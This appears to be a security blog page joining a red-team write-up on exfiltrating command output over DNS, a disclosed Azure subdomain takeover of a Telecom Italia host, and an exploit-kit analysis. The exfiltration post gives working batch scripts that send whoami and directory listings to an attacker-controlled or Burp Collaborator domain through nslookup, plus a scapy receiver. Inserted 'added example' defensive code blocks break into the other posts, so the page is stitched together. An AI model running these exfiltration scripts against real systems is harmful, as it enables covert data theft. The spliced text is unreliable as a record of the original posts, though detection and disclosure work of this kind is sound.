<h3>Exfiltrating data from a restricted Windows environment using DNS</h3>
<p>Security Obscurity Blog (Web application security and Red Teaming stuff). Published 2022-05-16, updated 2023-01-04.</p>
<p style="text-align: justify;">This post shows how I was able to perform an initial reconnaissance of the operating system without relying on other tools such as PowerShell, certutil or Living Off The Land (LOLBIN) binaries.</p><p>Scenario:</p><ul style="text-align: left;"><li>Java web application vulnerable to a blind remote command execution</li><li>Egress filtering rules allowing only the DNS protocol</li><li>Operating system: Windows Server 2003</li></ul><p style="text-align: justify;">After finding the vulnerability, the first commands I needed were "whoami" and "cd". The idea was to save the output of a command to a file, prepend its content to the Burp Collaborator domain name and perform a DNS query, so that the output arrives as a subdomain.</p><p style="text-align: center;"><b>nslookup [OUTPUT COMMAND].agupwd5anlxgca0ldez33q0u0l6bu0.burpcollaborator.net</b></p><p>For example:</p>
<pre><code class="language-plaintext">whoami>tmpfile
set /p v1= <tmpfile
cmd /v /c "nslookup %v1%.agupwd5anlxgca0ldez33q0u0l6bu0.burpcollaborator.net"
</code></pre>
<p>The one-liner:</p>
<pre><code class="language-plaintext">whoami > tmpfile && set /p v1= < tmpfile && cmd /v /c "nslookup %v1%.collaborator.burp.com"</code></pre>
<p style="text-align: justify;">This actually worked, but as soon as the output contains characters such as \ or spaces, which are not allowed in a URL, the DNS query fails. The workaround was an encoding scheme that maps the disallowed (reserved) characters to allowed ones; once the DNS query is received, it is decoded back.</p><p style="text-align: justify;"><a href="https://datatracker.ietf.org/doc/html/rfc3986#page-12" target="_blank">RFC 3986</a> states that these characters are reserved and cannot be used, so they must be encoded.</p><ul style="text-align: left;"><li>/ -> ZA</li><li>\ -> ZB</li><li>space -> ZC</li><li>new line -> ZF</li></ul><p style="text-align: justify;">Again, the idea is to save the output of a command to a file, load its content into a variable and map the reserved characters with my encoding scheme. This cannot be done in one line because the variable is not updated, so I need to save the code to a file.</p>
<pre><code class="language-plaintext">@echo off
set /p v1=<tmpfile
set v2=%v1::=ZA%
set v2=%v2:/=ZB%
set v2=%v2:\=ZC%
set v2=%v2: =ZD%
nslookup %v2%.agupwd5anlxgca0ldez33q0u0l6bu0.burpcollaborator.net
</code></pre>
<p style="text-align: justify;">It works, but what about commands that output multiple lines, like dir? In this case I ended up using a for loop and performing one DNS query per line. EnableDelayedExpansion is needed, otherwise the v1 variable will not be updated after the first set.</p><pre><code class="language-plaintext">@echo off
Setlocal EnableDelayedExpansion
REM %1 is the folder to list; every line of the listing becomes one DNS query
FOR /f "tokens=*" %%G IN ('dir /b %1') DO (
  set "v1=%%G"
  set "v1=!v1::=ZA!"
  set "v1=!v1:/=ZB!"
  set "v1=!v1:\=ZC!"
  set "v1=!v1: =ZD!"
  nslookup -type=A -timeout=0 !v1!.agupwd5anlxgca0ldez33q0u0l6bu0.burpcollaborator.net
)
</code></pre>
<p>To upload this file to the remote machine I echoed it line by line (for example <code>echo @echo off >> upfile.bat</code>) and, once finished, executed it with the folder whose content I needed as the argument.</p>
<pre><code class="language-plaintext">upfile.bat C:\</code></pre>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibJbNc3dLf2uC6ijpPfnoBFJUFomNM0XlNad46pVWFfmFEkZgl8Yvb2YTia--C68DoFtdOttCl7Jj0lPVNa1kx-BX_nqn97nqfikjHJNvUKFOPvhyrDrw7nSnSKvfZ-66mLCwLJlBeSsKxwvG4olnLLSv4wn9yMZ_kAxHX3x-yM1Q7l3YBYwAp74fn/s571/Burp_Collaborator_client.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="335" data-original-width="571" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibJbNc3dLf2uC6ijpPfnoBFJUFomNM0XlNad46pVWFfmFEkZgl8Yvb2YTia--C68DoFtdOttCl7Jj0lPVNa1kx-BX_nqn97nqfikjHJNvUKFOPvhyrDrw7nSnSKvfZ-66mLCwLJlBeSsKxwvG4olnLLSv4wn9yMZ_kAxHX3x-yM1Q7l3YBYwAp74fn/w491-h288/Burp_Collaborator_client.jpg" width="491" /></a></div><p>To automate the process I set up my own authoritative DNS server. I was using an EC2 instance on Amazon Web Services, and I bought a short domain name because it leaves more room for data inside the query name.</p><p>Configuration steps:</p><ol style="text-align: left;"><li>Route 53 > Hosted Zones > mydomain.com</li><li>Create an A record for your domain and add the IP address of the server instance</li><li>Create an NS record with a TTL of 0 so it will not be cached by the remote host</li></ol><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcRjkm9ypufsMQ68IKwsb2wx1IVZ1Sr36t5vh92Qgk0PXP3QwwkDs8QHb6JVwRoQyGCnNoGoQP7xA2qtG-vR5aBhn3dvbykVLPDFnr5B3MG7b-k_4pFm6Rm9vjGa_DNv3d8fsMPSnqHdQWcxTQYHUcqkTWMrSokp5qduTUNPlvx8m0GQqS9qqcXl3K/s650/aws_ns_record.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="650" data-original-width="372" height="460" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcRjkm9ypufsMQ68IKwsb2wx1IVZ1Sr36t5vh92Qgk0PXP3QwwkDs8QHb6JVwRoQyGCnNoGoQP7xA2qtG-vR5aBhn3dvbykVLPDFnr5B3MG7b-k_4pFm6Rm9vjGa_DNv3d8fsMPSnqHdQWcxTQYHUcqkTWMrSokp5qduTUNPlvx8m0GQqS9qqcXl3K/w263-h460/aws_ns_record.jpg" width="263" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgpZU_rm0sL_924zJrrCSaP9ZJT2R45KJnW9BUDbPnTF3pnL093H9A_kjdBEHH01VdLxIBP4PJ1UxOvEn4NJrK_obSsphtDDvrz3E15CIdcg4HucoD8Ou0qs5EdfC_Z6b5ziT_0MHC8X2p_5yCoFwmW5yUOrPX0_6HznYKv2ZKsqSo2oEuzFS4al-QI" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="388" data-original-width="1240" height="223" src="https://blogger.googleusercontent.com/img/a/AVvXsEgpZU_rm0sL_924zJrrCSaP9ZJT2R45KJnW9BUDbPnTF3pnL093H9A_kjdBEHH01VdLxIBP4PJ1UxOvEn4NJrK_obSsphtDDvrz3E15CIdcg4HucoD8Ou0qs5EdfC_Z6b5ziT_0MHC8X2p_5yCoFwmW5yUOrPX0_6HznYKv2ZKsqSo2oEuzFS4al-QI=w713-h223" width="713" /></a></div><p>Now, if I listen for DNS queries with tcpdump on the EC2 instance and perform a DNS query, I should see a request for the TEST subdomain.</p>
<pre><code class="language-plaintext">nslookup -type=A TEST.sub.mydomain.com</code></pre>
<p style="text-align: justify;">To automate the whole process I created a simple Python script that uses the scapy library to listen on UDP port 53 for DNS queries and decode the subdomain used as the payload.</p><pre><code class="language-python">#!/usr/bin/python3
#
# pip3 install scapy
# script must be run as root
#
from scapy.all import *

net_interface = "eth0"
packet_filter = " and ".join([
    "udp dst port 53",
    "udp[10] & 0x80 = 0",      # QR bit = 0: queries only, not responses
    # "src host 1.1.1.1",      # if you want to filter by source IP address
])
exfil_domain = ".sub.mydomain.com."   # remember the trailing dot

# characters map (must match the encoding used by the batch script)
char_map = {
    "ZA": ":",
    "ZB": "/",
    "ZC": "\\",
    "ZD": " ",
    "ZE": "\n",
    "ZF": "",
}

def map_character(query_encoded):
    # replace every marker with the character it stands for
    for key in char_map:
        if key in query_encoded:
            query_encoded = query_encoded.replace(key, char_map[key])
    return query_encoded

content = []

def dns_callback(packet):
    # ignore anything on port 53 that is not a DNS query with a question
    if not packet.haslayer(DNS) or packet[DNS].qd is None:
        return
    qname = packet[DNS].qd.qname.decode('utf-8')
    # only handle queries for our delegated zone
    if not qname.endswith(exfil_domain):
        return
    # strip the zone first, then decode the payload labels
    qname_dec = map_character(qname[:-len(exfil_domain)])
    # print each decoded line only once (nslookup may retry)
    if qname_dec not in content:
        content.append(qname_dec)
        print(qname_dec)

sniff(filter=packet_filter, prn=dns_callback, store=0, iface=net_interface)
</code></pre>
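<p style="text-align: justify;">The script above is the receiving end of the channel. From the defender's side the same traffic shows up in resolver or DNS-server logs, and the following added example (my code, not the post's) scores such logs for the pattern the batch scripts produce: one client sending many distinct, long, high-entropy names under a single parent domain. The log format and the sample lines are constructed for this example, and the thresholds are illustrative starting points rather than tuned values.</p>

```python
import math
import re
from collections import defaultdict

# Constructed resolver log lines: "<timestamp> <client> <qname> <qtype>".
# The encoded names mirror the batch scripts' scheme (ZC = backslash, ZD = space).
SAMPLE_LOG = """\
2022-05-16T12:00:01 10.0.0.5 www.example.com. A
2022-05-16T12:00:02 10.0.0.5 ntZDauthorityZCsystem.sub.mydomain.com. A
2022-05-16T12:00:03 10.0.0.5 ProgramZDFiles.sub.mydomain.com. A
2022-05-16T12:00:03 10.0.0.5 Windows.sub.mydomain.com. A
2022-05-16T12:00:04 10.0.0.5 inetpub.sub.mydomain.com. A
2022-05-16T12:00:04 10.0.0.5 DocumentsZDandZDSettings.sub.mydomain.com. A
2022-05-16T12:00:05 10.0.0.7 mail.example.com. MX
2022-05-16T12:00:06 10.0.0.7 www.example.com. A
"""

LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qname>\S+)\s+(?P<qtype>\S+)$")

# Illustrative thresholds: tune them against a baseline of your own traffic.
MIN_DISTINCT = 4        # distinct payloads per (client, parent) in the window
MIN_MEAN_LEN = 10.0     # mean payload length in characters
MIN_MEAN_ENTROPY = 2.5  # mean Shannon entropy of the payload, bits/char


def parse_log(text):
    """Yield (client, qname) with qname lower-cased and trailing dot removed."""
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:  # blank or malformed lines are skipped
            yield m.group("client"), m.group("qname").rstrip(".").lower()


def split_query(qname):
    """Return (payload, parent): parent is the last two labels, payload the rest.
    A production tool would use the Public Suffix List instead of 'last two'."""
    labels = qname.split(".")
    if len(labels) <= 2:
        return "", qname
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def shannon_entropy(s):
    """Bits per character of s (0.0 for the empty string)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def analyze(text):
    """Group queries by (client, parent domain) and score every group."""
    groups = defaultdict(set)
    for client, qname in parse_log(text):
        payload, parent = split_query(qname)
        if payload:
            groups[(client, parent)].add(payload)
    report = {}
    for key, payloads in groups.items():
        mean_len = sum(len(p) for p in payloads) / len(payloads)
        mean_ent = sum(shannon_entropy(p) for p in payloads) / len(payloads)
        report[key] = {
            "distinct": len(payloads),
            "mean_len": mean_len,
            "mean_entropy": mean_ent,
            # all three features must trip: any one alone is too noisy
            "flagged": (len(payloads) >= MIN_DISTINCT
                        and mean_len >= MIN_MEAN_LEN
                        and mean_ent >= MIN_MEAN_ENTROPY),
        }
    return report


def flagged_sources(text):
    """Sorted (client, parent) pairs that look like an encoded DNS channel."""
    return sorted(k for k, v in analyze(text).items() if v["flagged"])


if __name__ == "__main__":
    for (client, parent), stats in sorted(analyze(SAMPLE_LOG).items()):
        print(client, parent, stats)
```

<p style="text-align: justify;">Large CDNs and telemetry services also produce many distinct subdomains per client, so this should run against an allow-list of known parent domains and rely on the combination of features rather than any single one. What an analyst would corroborate is exactly what the post relies on: a recently delegated zone with a zero TTL receiving a burst of unique, never-repeated names from one internal host.</p>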
<p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFCIXx0R5e9yzjBYkC_0oCAL4yPy1I4PUQyRw81hLuZevjFmZgrBrQMuwYRTiE5gnA6DUXUIdn6F925QtrPrLWxfnaJULQAhTVAZM5jLVEDUkMq0XnxezcPFV_IVMqI6YmOIfTQpX9jYyeGHVb1SBtPBatnwZ2Qocbsq321fbbnLDL84hWVoVGVKPo/s919/dnsdecoder.jpg" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="172" data-original-width="919" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFCIXx0R5e9yzjBYkC_0oCAL4yPy1I4PUQyRw81hLuZevjFmZgrBrQMuwYRTiE5gnA6DUXUIdn6F925QtrPrLWxfnaJULQAhTVAZM5jLVEDUkMq0XnxezcPFV_IVMqI6YmOIfTQpX9jYyeGHVb1SBtPBatnwZ2Qocbsq321fbbnLDL84hWVoVGVKPo/w717-h133/dnsdecoder.jpg" width="717" /></a></p><p style="text-align: justify;">This initial reconnaissance allowed me to exploit another vulnerability (arbitrary file upload) and move the uploaded file into the directory used by the web server.</p><p style="text-align: justify;">This technique is meant only for the initial recon phase. The next step would be downloading a C2 implant or, using the gathered information, exploiting other web application vulnerabilities.</p><p>References:</p><ul style="text-align: left;"><li><a href="https://tools.ietf.org/html/rfc3986#page-12">https://tools.ietf.org/html/rfc3986#page-12</a></li><li><a href="https://www.dostips.com/DtTipsStringManipulation.php">https://www.dostips.com/DtTipsStringManipulation.php</a></li><li><a href="https://ss64.com/nt/delayedexpansion.html">https://ss64.com/nt/delayedexpansion.html</a></li><li><a href="https://isc.sans.edu/forums/diary/Exfiltrating+data+from+very+isolated+environments/23645/">https://isc.sans.edu/forums/diary/Exfiltrating+data+from+very+isolated+environments/23645/</a></li><li><a href="https://jasonmurray.org/posts/2020/scapydns/">https://jasonmurray.org/posts/2020/scapydns/</a></li></ul>
<h3>Telecom Italia (TIM) - Azure subdomain takeover</h3>
<p>Published 2020-11-24, updated 2020-11-26.</p>
<p style="text-align: justify;">Subdomain takeover is a known technique that has become popular in recent years with the advent of cloud providers. At the end of April I was able to take over the timcafe.tim.it subdomain, which belongs to the Telecom Italia network.</p><h4 style="text-align: justify;">What is subdomain takeover?</h4><p style="text-align: justify;">Basically, subdomain takeover is the process of hijacking someone else's subdomain. Let's make an example. When a company hosts a website in the cloud, let's say contoso.com hosts a web application on a cloud provider, they create a cloud application which has a unique DNS name, for example myapp.cloudprovider.com.</p><p style="text-align: justify;">Then contoso.com wants to reach the web application from one of its subdomains, so they create a Canonical Name (CNAME) record on their DNS servers for myapp.contoso.com that maps one domain name (an alias) to another (the canonical name). In this case myapp.contoso.com is mapped to myapp.cloudprovider.com.</p><p style="text-align: justify;">Now if you resolve the domain name, this will be the output:</p><div style="text-align: center;">myapp.contoso.com CNAME myapp.cloudprovider.com</div><p style="text-align: center;">myapp.cloudprovider.com A 1.1.1.1</p><p style="text-align: justify;">After some time, Contoso decides to remove the web application from the cloud provider, so they delete the instance but do not update their DNS records. Here comes the subdomain takeover: since the cloud app is deleted, anyone can create another cloud app with the same name and hijack Contoso's subdomain. So when someone visits myapp.contoso.com the web application will still be myapp.cloudprovider.com, but now it's under someone else's control.</p><p style="text-align: justify;">An in-depth explanation can be found at the following links:</p><ul><li><a href="https://0xpatrik.com/subdomain-takeover-basics/">Subdomain Takeover: Basics</a></li><li><a href="https://www.hackerone.com/blog/Guide-Subdomain-Takeovers">A Guide To Subdomain Takeovers</a></li><li><a href="https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/">Hostile Subdomain Takeover using Heroku/Github/Desk + more</a></li></ul><h4 style="text-align: justify;">Long story short</h4><p style="text-align: justify;">Since Telecom Italia has a responsible disclosure program, I decided to check whether one of the tim.it subdomains was vulnerable. After an enumeration phase I used subjack, which identified timcafe.tim.it as potentially vulnerable to hijacking.</p><p style="text-align: justify;">Looking at the DNS record with dig showed that the subdomain returned a CNAME record pointing to an Azure web application, timcafe.azurewebsites.net, that wasn't registered anymore.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-k8ANN5CTpy0/X7o4UWH1MgI/AAAAAAAAA90/EORhSVP48UoqWCQ0eFzA4U24pOrIC6y3QCLcBGAsYHQ/s405/nslookup_timcafe_azurewebsite.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="119" data-original-width="405" height="126" src="https://1.bp.blogspot.com/-k8ANN5CTpy0/X7o4UWH1MgI/AAAAAAAAA90/EORhSVP48UoqWCQ0eFzA4U24pOrIC6y3QCLcBGAsYHQ/w429-h126/nslookup_timcafe_azurewebsite.png" width="429" /></a></div><p style="text-align: justify;">Since Microsoft Azure allows anyone with a valid account to create a web application, I created a new web application named timcafe; from then on the timcafe.tim.it DNS record points to the application I had just created.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-LDSH0kUP8xQ/X7qUy2mLz3I/AAAAAAAAA-A/ndZ06P5TU4gTkD2U_mJYK7Jwa71itY8pACLcBGAsYHQ/s744/create_web_application_edited.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="704" data-original-width="744" height="606" src="https://1.bp.blogspot.com/-LDSH0kUP8xQ/X7qUy2mLz3I/AAAAAAAAA-A/ndZ06P5TU4gTkD2U_mJYK7Jwa71itY8pACLcBGAsYHQ/w640-h606/create_web_application_edited.png" width="640" /></a></div><div><br /></div><div style="text-align: justify;">Oh, that was easy. Hold on, because if you visit the website a nice "HTTP 404 website not found" message will appear. That happens because after resolving the DNS name the client performs an HTTP GET request to 52.173.149.254 with the HTTP Host header set to timcafe.tim.it, and the Azure web server doesn't know which web application that name is mapped to, so it returns an error.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">To fix this error, go to "App Service > Settings > Custom domains" and add a custom domain, as shown in the screenshot below, that maps the incoming name to the web application.</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: left;"><a href="https://1.bp.blogspot.com/-iCPakEnCVuI/X7quvTdenFI/AAAAAAAAA-g/P9-HrBIzqLs0qL35otZb_vG6VLejNoMbACLcBGAsYHQ/s1286/azure_custom_domain.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="640" data-original-width="1286" height="409" src="https://1.bp.blogspot.com/-iCPakEnCVuI/X7quvTdenFI/AAAAAAAAA-g/P9-HrBIzqLs0qL35otZb_vG6VLejNoMbACLcBGAsYHQ/w829-h409/azure_custom_domain.png" width="829" /></a></div><div><br /></div><p style="text-align: justify;">After that, timcafe.tim.it shows the content I uploaded to my instance.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-auZSzcCHH-M/X7qfOa_gflI/AAAAAAAAA-M/BNPRSZKyj60cgZIgYRXlqGtM4WONbXdOwCLcBGAsYHQ/s644/2020-04-26_16_36_43-Microsoft_Edge.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="222" data-original-width="644" height="178" src="https://1.bp.blogspot.com/-auZSzcCHH-M/X7qfOa_gflI/AAAAAAAAA-M/BNPRSZKyj60cgZIgYRXlqGtM4WONbXdOwCLcBGAsYHQ/w516-h178/2020-04-26_16_36_43-Microsoft_Edge.png" width="516" /></a></div><h4 style="text-align: justify;">Now what?</h4><div>Okay, cool, now I have complete control over a subdomain. What can I do next? Here is a list of potential attacks that could be performed:</div><ul style="text-align: left;"><li>Steal all cookies with *.tim.it scope that were set without the Secure flag from users' browsers;</li><li>Check whether the timcafe.tim.it subdomain is still referenced from another domain. For example, if tim.it loads a JavaScript file from timcafe.tim.it, it is possible to upload a script and potentially execute arbitrary JavaScript code for tim.it visitors;</li><li>Perform cross-domain requests to API endpoints that use cookies to keep track of the user session;</li><li>Upload a self-signed SSL certificate and, if a user accepts the browser warnings, also steal cookies set with the Secure flag;</li><li>Phishing and spreading malware on behalf of Telecom Italia;</li><li>Bypass Content-Security-Policy (CSP).</li></ul><div>After hijacking the subdomain I contacted TIM through their responsible disclosure program to inform them about the misconfiguration, and after two days the issue was fixed.</div><div><br /></div><div>Useful links:</div><ul style="text-align: left;"><li><a href="https://github.com/haccer/subjack">Subjack</a></li><li><a href="https://github.com/EdOverflow/can-i-take-over-xyz">Can I take over XYZ?</a></li></ul>
<h3>Styxy Cool Exploit Kit: One Applet to Exploit All Vulnerabilities</h3>
<p>Published 2013-07-25, updated 2020-11-21.</p>
<div style="text-align: justify;">Styxy Cool Exploit Kit is a particular kit because it is a "merge" between the Cool and Styxy exploit kits. Here we are going to cover only the Java-related exploits, so if you want to know what vulnerabilities it has and why it's called Styxy Cool, go check Kafeine's post <a href="http://malware.dontneedcoffee.com/2013/07/a-styxy-cool-ek.html">here</a>.</div>
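<p style="text-align: justify;">The misconfiguration in the Telecom Italia post above is a CNAME whose target has been decommissioned, and the fix TIM applied was on the DNS side: remove or repoint the stale record. The following added example (my code, not the post's) is the audit a zone owner would run to catch that condition before someone else does: it walks a zone export, resolves every CNAME target, and reports the ones that no longer answer, ranking higher those on self-service cloud suffixes. The zone records and the resolver view are constructed for the example; azurewebsites.net is the suffix from the post, the other suffixes are assumptions to be replaced with a vetted list.</p>

```python
import socket

# Cloud suffixes where an unclaimed hostname can be registered by any account.
# azurewebsites.net is the service from the post; the other two are assumptions
# added for illustration and should be replaced with your own vetted list.
TAKEOVER_PRONE_SUFFIXES = ("azurewebsites.net", "cloudapp.azure.com", "trafficmanager.net")

# Constructed zone export: (owner name, record type, record data).
ZONE = [
    ("www.contoso.com",   "A",     "203.0.113.10"),
    ("myapp.contoso.com", "CNAME", "myapp.cloudprovider.com."),
    ("shop.contoso.com",  "CNAME", "shop-live.azurewebsites.net."),
    ("timcafe.tim.it",    "CNAME", "timcafe.azurewebsites.net."),
]

# Constructed resolver view for the offline run: names that resolve, and to what.
# Anything absent models an NXDOMAIN answer, which is what dig showed for
# timcafe.azurewebsites.net in the post.
RESOLVABLE = {
    "shop-live.azurewebsites.net": "203.0.113.55",
}


def stub_resolve(name):
    """Offline stand-in for a resolver: IP string, or None for NXDOMAIN."""
    return RESOLVABLE.get(name)


def live_resolve(name):
    """Real lookup through the system resolver; None when the name does not resolve."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def is_takeover_prone(target):
    """True when target is a hostname under one of the self-service cloud suffixes."""
    return any(target == s or target.endswith("." + s) for s in TAKEOVER_PRONE_SUFFIXES)


def audit_cnames(zone, resolve=stub_resolve):
    """Return one finding per CNAME whose target no longer resolves."""
    findings = []
    for owner, rtype, data in zone:
        if rtype != "CNAME":
            continue
        target = data.rstrip(".").lower()
        if resolve(target) is not None:
            continue  # the target still answers: not dangling
        findings.append({
            "owner": owner,
            "target": target,
            # A dead target on a self-service cloud suffix is the takeover case;
            # a dead target elsewhere is still a stale record that should go.
            "severity": "high" if is_takeover_prone(target) else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in audit_cnames(ZONE):
        print(f["severity"].upper(), f["owner"], "->", f["target"])
```

<p style="text-align: justify;">Against a real zone export, pass <code>resolve=live_resolve</code>. Two caveats: a target that resolves is not proof the name is claimed by you, only that someone answers for it, so high findings are verified by trying to claim the name in the provider's portal, as the post did; and the durable fix is process, not tooling: delete the CNAME before the cloud resource it points at, not after.</p>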
<br />
Between the eighth and ninth of July two interesting things happened:<br />
<ol>
<li>Jar size increased from 5Kb to 28 Kb</li>
<li>Payload (Reveton) disappeared from fiddler </li>
</ol>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-NUwuZ_fVYBg/Ue13zzGbVjI/AAAAAAAAAqI/YMIay1vCEUQ/s1600/difference_fiddler_resized.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-NUwuZ_fVYBg/Ue13zzGbVjI/AAAAAAAAAqI/YMIay1vCEUQ/s1600/difference_fiddler_resized.jpg" /></a>
</div>
<br />
<br style="clear: both;" /><div>Let's take a step back and analyze the exploit chain from the eighth of July.</div><div><br /></div><div>
The first page <b>/abortion-success_conductor.php</b> displays a bunch of phrases about Yahoo France, but what it really does is check whether you have a vulnerable Java plugin installed in your browser.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-4zqc9-ORozU/Ue2Z0WhUqSI/AAAAAAAAAqY/zWAWAVpjkBg/s1600/yahoo_landing.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="432" src="http://2.bp.blogspot.com/-4zqc9-ORozU/Ue2Z0WhUqSI/AAAAAAAAAqY/zWAWAVpjkBg/w320-h432/yahoo_landing.JPG" width="320" /></a></div>
<br />
The page contains an instance of PluginDetect version 0.8 plus obfuscated JavaScript code.</div><div><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-RvEQM3XVb-o/Ue2ao_J-qmI/AAAAAAAAAqk/g4y2UVkJGHQ/s1600/plugindetect.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-RvEQM3XVb-o/Ue2ao_J-qmI/AAAAAAAAAqk/g4y2UVkJGHQ/s1600/plugindetect.JPG" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-onJjvBGx5uw/Ue2bIamWcII/AAAAAAAAAqs/_RQsqcOvHS0/s1600/obfuscated_js.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-onJjvBGx5uw/Ue2bIamWcII/AAAAAAAAAqs/_RQsqcOvHS0/s1600/obfuscated_js.JPG" /></a></div>
<br />
What does this code do?<br />
<br />
It takes the content of the textarea from <b>/objection_confident_sulphur.html</b>, since in the middle of the first page there is an iframe pointing to that one.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-9gVzy92vVCo/Ue2codNp5GI/AAAAAAAAAq8/lCTidTiaHqI/s1600/second_page_textarea.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-9gVzy92vVCo/Ue2codNp5GI/AAAAAAAAAq8/lCTidTiaHqI/s1600/second_page_textarea.JPG" /></a></div>
<br />
Then it converts two characters at a time into a base-30 integer and turns the result into a character with String.fromCharCode.<br />
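The two-characters-per-code-point transform described above is what an analyst re-implements to read the textarea payload without running the page. The following is an added example (my code, not the kit's script): a decoder for that scheme, plus the inverse used only to build test data. It assumes the script's conversion is parseInt with radix 30 followed by String.fromCharCode, which is what the description implies, and the sample string is constructed.<br />

```python
DIGITS = "0123456789abcdefghijklmnopqrst"   # the 30 symbols of base 30


def decode_base30_pairs(blob):
    """Decode text where every two characters form one base-30 number whose
    value is a character code; whitespace a textarea may carry is ignored."""
    blob = "".join(blob.split())
    if len(blob) % 2:
        raise ValueError("odd-length input: not a sequence of pairs")
    # int(pair, 30) is the Python equivalent of parseInt(pair, 30)
    return "".join(chr(int(blob[i:i + 2], 30)) for i in range(0, len(blob), 2))


def encode_base30_pairs(text):
    """Inverse transform, used here to produce test data for the decoder."""
    out = []
    for ch in text:
        hi, lo = divmod(ord(ch), 30)
        if hi >= 30:
            raise ValueError("code point too large for two base-30 digits")
        out.append(DIGITS[hi] + DIGITS[lo])
    return "".join(out)


SAMPLE = "2c3b3i3i3l"   # constructed: encodes "Hello"

if __name__ == "__main__":
    print(decode_base30_pairs(SAMPLE))
```

Two base-30 digits cover code points up to 899, which is why the scheme is enough for the ASCII JavaScript the kit delivers; the decoder raises on anything that is not a pair so truncated captures are noticed rather than silently misread.<br />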
<br />
Once deobfuscated:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-wiowEOARz4U/Ue2fWxy-LWI/AAAAAAAAArM/15jJR7U_AYM/s1600/deobfuscated_js.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-wiowEOARz4U/Ue2fWxy-LWI/AAAAAAAAArM/15jJR7U_AYM/s1600/deobfuscated_js.JPG" /></a></div>
<br />
If you are vulnerable, the next and last page executes the malicious applet. In this case I was using Java SE 7 update 17, so <b>/test_membrane.html</b> contains CVE-2013-2423.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-oiJjeCqhqIM/Ue2grI9jiII/AAAAAAAAArc/X7ajFrn4jWo/s1600/applet_jnlp.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-oiJjeCqhqIM/Ue2grI9jiII/AAAAAAAAArc/X7ajFrn4jWo/s1600/applet_jnlp.JPG" /></a></div>
<br />
<div style="text-align: center;">
<b><span style="font-size: large;">Jar size</span></b></div>
<div style="text-align: center;">
<b><span style="font-size: large;"><br /></span></b></div>
The size of the applet increased by 25 Kb because it now contains four Java vulnerabilities instead of the usual one.<br />
<br />
If we open the malicious jar with JD-GUI we can see an if/else statement inside Main.class where it tries several exploits.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-XDILbjhtepo/Ue6QGmG-_0I/AAAAAAAAAr8/dkVvv10Mwno/s1600/jar_all_exploit.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-XDILbjhtepo/Ue6QGmG-_0I/AAAAAAAAAr8/dkVvv10Mwno/s1600/jar_all_exploit.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-fLwqD7UQC3E/Ue7D8OaGkXI/AAAAAAAAAsc/gbi6akAcjTg/s1600/jar_classes_list_color.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-fLwqD7UQC3E/Ue7D8OaGkXI/AAAAAAAAAsc/gbi6akAcjTg/s1600/jar_classes_list_color.jpg" /></a></div>
<br />
If one of these successfully sets the SecurityManager to null (disabling it), it runs code inside the MainAdd2 class, which is supposed to download and execute Reveton. This new way of using Java vulnerabilities certainly has an advantage when it comes to obfuscating the code, because you don't have to make four jars fully undetectable (FUD), just one.<br /><br />
<div style="text-align: center;">
